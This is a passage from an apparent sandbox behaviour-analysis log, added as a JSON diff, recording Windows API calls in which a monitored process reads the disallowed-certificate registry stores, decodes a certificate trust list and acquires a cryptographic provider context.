"arguments": [ + { + "name": "KeyHandle", + "value": "0x00000528" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\" + } + ], + "repeated": 0, + "id": 1336 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1337 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "#\\x0fk%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1338 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1339 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1340 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1341 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1342 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000528" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1343 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1344 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1345 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "27748148BBE67A43CDBFEC6C3784862CE134E6EA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA" + } + ], + "repeated": 0, + "id": 1346 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob" + } + ], + "repeated": 1, + "id": 1347 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x14\\x00\\x00\\x00't\\x81H\\xbb\\xe6zC\\xcd\\xbf\\xecl7\\x84\\x86,\\xe14\\xe6\\xea\"\\x00\\x00\\x00\\x01\\x00\\x01\\x00*\\x02\\x00\\x000\\x82\\x02&\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x02\\x170\\x82\\x02\\x13\\x02\\x01\\x011\\x000\\x82\\x02\\x08\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x01\\xf90\\x82\\x01\\xf50\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x01\\x900\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob" + } + ], + "repeated": 0, + "id": 1348 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1349 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x76800725", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x00\\x00\\x00" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 1350 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1351 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1352 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x756bc626", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\rsaenh.dll" + }, + { + "name": "BaseAddress", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 1353 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x756bc626", + "category": "crypto", + "api": "CryptAcquireContextA", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Container", + "value": "" + }, + { + "name": "Provider", + "value": "Microsoft Enhanced RSA and AES Cryptographic Provider" + }, + { + "name": "Flags", + "value": "0xf0000000" + } + ], + "repeated": 0, + "id": 1354 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1355 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1356 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1357 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1358 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1359 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1360 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1361 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1362 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1363 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1364 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1365 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1366 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000052c" + } + ], + "repeated": 0, + "id": 1367 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1368 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1369 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Disallowed\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Disallowed\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1370 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1371 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1372 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1373 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1374 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1375 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000052c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\" + } + ], + "repeated": 0, + "id": 1376 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + 